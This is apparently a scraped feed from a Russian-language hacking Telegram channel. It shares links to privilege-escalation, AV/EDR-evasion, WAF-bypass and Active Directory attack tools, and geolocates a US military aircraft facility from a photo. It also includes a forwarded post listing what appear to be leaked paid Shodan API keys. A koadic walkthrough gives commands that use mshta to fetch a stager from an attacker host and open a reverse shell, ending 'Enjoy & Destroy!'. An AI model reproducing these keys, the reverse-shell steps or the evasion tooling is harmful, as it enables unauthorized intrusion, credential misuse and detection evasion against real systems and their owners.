🔥Инструмент для повышения привилегий по Win
For Windows 10 - 11 Windows Server 2012 - 2022
https://github.com/BeichenDream/PrintNotifyPotato
#LPE #win #patato #privesc
For Windows 10 - 11 Windows Server 2012 - 2022
https://github.com/BeichenDream/PrintNotifyPotato
#LPE #win #patato #privesc
GitHub
GitHub - BeichenDream/PrintNotifyPotato: PrintNotifyPotato
PrintNotifyPotato. Contribute to BeichenDream/PrintNotifyPotato development by creating an account on GitHub.
🔥Инструмент, который может попытаться найти IP, скрытый за CloudFlare
https://github.com/zidansec/CloudPeler
#osint #cloudflare #reverseproxy #ip #recon
https://github.com/zidansec/CloudPeler
#osint #cloudflare #reverseproxy #ip #recon
GitHub
GitHub - zidansec/CloudPeler: CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool you…
CrimeFlare is a useful tool for bypassing websites protected by CloudFlare WAF, with this tool you can easily see the real IP of websites that have been protected by CloudFlare. The resulting infor...
Forwarded from Новостник Кибербеза
EDR и антивирусы научились удалять системные файлы и драйверы
https://www.securitylab.ru/news/535225.php
https://www.securitylab.ru/news/535225.php
SecurityLab.ru
EDR и антивирусы научились удалять системные файлы и драйверы
Уязвимости превращают популярные продукты безопасности в вайперы.
🔥PE & Shellcode Cryptor
https://github.com/frkngksl/Shoggoth
#crypto #cryptor #evasion #bypass #av #edr #redteam
https://github.com/frkngksl/Shoggoth
#crypto #cryptor #evasion #bypass #av #edr #redteam
GitHub
GitHub - frkngksl/Shoggoth: Shoggoth: Asmjit Based Polymorphic Encryptor
Shoggoth: Asmjit Based Polymorphic Encryptor. Contribute to frkngksl/Shoggoth development by creating an account on GitHub.
🔥Regex fuzzer
REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications
https://github.com/0xacb/recollapse
#regex #fuzz #fuzzer #tool #bypass #waf
REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications
https://github.com/0xacb/recollapse
#regex #fuzz #fuzzer #tool #bypass #waf
GitHub
GitHub - 0xacb/recollapse: REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations…
REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications - 0xacb/recollapse
Forwarded from Darkside
Shodan API Keys ( paid plans ) 185
https://api.shodan.io/api-info?key={API}
https://api.shodan.io/api-info?key={API}
cvMrPhi9VvUYe0HsD7dHKXAojghAjsmT - plusTnzrcytxidVqp6Z38iH3xnmu77tjt6qm - devgAkg718JvQD1mtWze1vqrEH3l1gcHejp - dev👍1
🔥NTLM scan
Сканит эндпоинт в поисках NTLM
https://github.com/nyxgeek/ntlmscan
#scan #ntlm #tool #privesc
Сканит эндпоинт в поисках NTLM
https://github.com/nyxgeek/ntlmscan
#scan #ntlm #tool #privesc
👍1
Forwarded from Monkey Hacker
#windows
Полезные тулзы во время пентеста Active Directory
Список самый простой, но интересный:
🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay
Полезные тулзы во время пентеста Active Directory
Список самый простой, но интересный:
🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay
GitHub
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
Impacket is a collection of Python classes for working with network protocols. - fortra/impacket
👍3
Forwarded from Zer0Day Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Life-Hack - Хакер
Telegraph
Linux: Создание виртуального сетевого интерфейса
В системах Linux настройка виртуального сетевого интерфейса – это не то, что большинству людей нужно делать очень часто, но иногда это может пригодиться. Система распознает виртуальный интерфейс как реальный, физический интерфейс. В этом отношении он работает…
🔥Remotely Control Any PC With koadic freamework!
https://www.youtube.com/watch?v=UImsfTpYjvU&ab_channel=LoiLiangYang
#c2 #postexploitation #reverseshell #lolbas #tools #pentest #redteam
https://www.youtube.com/watch?v=UImsfTpYjvU&ab_channel=LoiLiangYang
#c2 #postexploitation #reverseshell #lolbas #tools #pentest #redteam
YouTube
Remotely Control Any PC With This Simple Tool!
// Membership //
Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking videos by clicking this link: https://www.youtube.com/channel/UC1szFCBUWXY3ESff8dJjjzw/join
// Courses…
Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking videos by clicking this link: https://www.youtube.com/channel/UC1szFCBUWXY3ESff8dJjjzw/join
// Courses…
🔥2
Golden HackSpace | Hacker notes
🔥Remotely Control Any PC With koadic freamework! https://www.youtube.com/watch?v=UImsfTpYjvU&ab_channel=LoiLiangYang #c2 #postexploitation #reverseshell #lolbas #tools #pentest #redteam
kali$ git clone https://github.com/zerosum0x0/koadic.gitRun koadic
kali$ use stager/js/mshtaFill stager option like in metasploit via SET
kali$ runWow! You've got a reverse shell!
windows> mshta http://192.168.1.3:1234/BFIER
kali$ zombiesEnjoy & Destroy!
kali$ cmdhell 0
#c2 #postexploitation #reverseshell #lolbas #tools #pentest #redteam
🔥Malpedia
Этот инструмент позволяет получить информацию о вредоносном ПО или об APT группировке, а также найти упоминания в различных источниках. Обычно в этих источниках публикуются IOC\IOA, которые могут помочь прокачать правила корреляции в SOC.
https://malpedia.caad.fkie.fraunhofer.de/
#feeds #ioc #ioa #apt #malware #soc
Этот инструмент позволяет получить информацию о вредоносном ПО или об APT группировке, а также найти упоминания в различных источниках. Обычно в этих источниках публикуются IOC\IOA, которые могут помочь прокачать правила корреляции в SOC.
https://malpedia.caad.fkie.fraunhofer.de/
#feeds #ioc #ioa #apt #malware #soc
👍2
Forwarded from Чёрный Треугольник
OSINT-разведчик вычислил ангары с новым сверхсекретным американским бомбандировщиком по звездам😅
☝🏻Помните недавний пост о самолете-невидимке ВВС США под кодовым названием B-21?
🔻OSINT-разведчик под ником Джон Мак Элхон в своем твиттер отметил, что фотография нового самолета-невидимки ВВС США, сделанная ночью, на фоне звезд. Мы можем использовать их, чтобы найти точное местоположение.
Сайт Astrometry.net позволит нам загрузить фотографию звездного неба с фото и нарисовать соответствующие созвездия.
Это также дает нам кучу файлов звездных карт, которые мы можем использовать позже.😊
На исходном веб-сайте изображения B-21 у нас есть некоторые метаданные, такие как дата съемки.
Они были удалены с тех пор, как были опубликованы посты в твиттер, но архив Waybackmachine, все еще позволяет их получить.😅
Импортируя нашу карту звездного неба в Stellarium и добавив туда дату фотографии, мы можем получить визуализацию, которая очень хорошо совпадет с нашим исходным изображением звездного неба.
Исходя из этого и совместив углы созвездия с горизонтом, мы можем оценить время, когда была сделана фотография - 1:30 ночи
1:30 утра — прекрасное время, чтобы выкатить самолет-невидимку из его ангара, когда количество спутников для съемки над США минимально.😉
Мы знаем, что угол между северной звездой и горизонтом даст нам приблизительную широту того места, где стоит наблюдатель.
Предположим, что это место находится где-то в пределах США, поэтому мы можем провести линию по широте 34 градуса через всю страну.
Баз ВВС США куча по всей стране, но не многие пересекают эту линию😄
Исторически сложилось так, что большинство самолетов-невидимок в США строятся в Калифорнии, и мы знаем, что этот самолет построен компанией Northrop Grumman, которая также в основном разрабатывает свои самолеты там.
Сужая наш поиск до Калифорнии, мы находим только одну базу, которая пересекается с линией — авиабаза Эдвардс.😊
У Northrop Grumman не так много объектов для разработки в Эдвардсе, но они есть в 30 милях к югу в региональном аэропорту Палмдейл. Там же разрабатывали самолет В-2. Один виден из представления Google Map
Теперь мы знаем, что это изображение B-21 компании Northrop Grumman, сделанное примерно в 1:30 ночи 29 ноября 2022 года на заводе ВВС 42 (34,6399, -118,0744) — теперь все эти данные общедоступны😎
☝🏻Помните недавний пост о самолете-невидимке ВВС США под кодовым названием B-21?
🔻OSINT-разведчик под ником Джон Мак Элхон в своем твиттер отметил, что фотография нового самолета-невидимки ВВС США, сделанная ночью, на фоне звезд. Мы можем использовать их, чтобы найти точное местоположение.
Сайт Astrometry.net позволит нам загрузить фотографию звездного неба с фото и нарисовать соответствующие созвездия.
Это также дает нам кучу файлов звездных карт, которые мы можем использовать позже.😊
На исходном веб-сайте изображения B-21 у нас есть некоторые метаданные, такие как дата съемки.
Они были удалены с тех пор, как были опубликованы посты в твиттер, но архив Waybackmachine, все еще позволяет их получить.😅
Импортируя нашу карту звездного неба в Stellarium и добавив туда дату фотографии, мы можем получить визуализацию, которая очень хорошо совпадет с нашим исходным изображением звездного неба.
Исходя из этого и совместив углы созвездия с горизонтом, мы можем оценить время, когда была сделана фотография - 1:30 ночи
1:30 утра — прекрасное время, чтобы выкатить самолет-невидимку из его ангара, когда количество спутников для съемки над США минимально.😉
Мы знаем, что угол между северной звездой и горизонтом даст нам приблизительную широту того места, где стоит наблюдатель.
Предположим, что это место находится где-то в пределах США, поэтому мы можем провести линию по широте 34 градуса через всю страну.
Баз ВВС США куча по всей стране, но не многие пересекают эту линию😄
Исторически сложилось так, что большинство самолетов-невидимок в США строятся в Калифорнии, и мы знаем, что этот самолет построен компанией Northrop Grumman, которая также в основном разрабатывает свои самолеты там.
Сужая наш поиск до Калифорнии, мы находим только одну базу, которая пересекается с линией — авиабаза Эдвардс.😊
У Northrop Grumman не так много объектов для разработки в Эдвардсе, но они есть в 30 милях к югу в региональном аэропорту Палмдейл. Там же разрабатывали самолет В-2. Один виден из представления Google Map
Теперь мы знаем, что это изображение B-21 компании Northrop Grumman, сделанное примерно в 1:30 ночи 29 ноября 2022 года на заводе ВВС 42 (34,6399, -118,0744) — теперь все эти данные общедоступны😎
👍1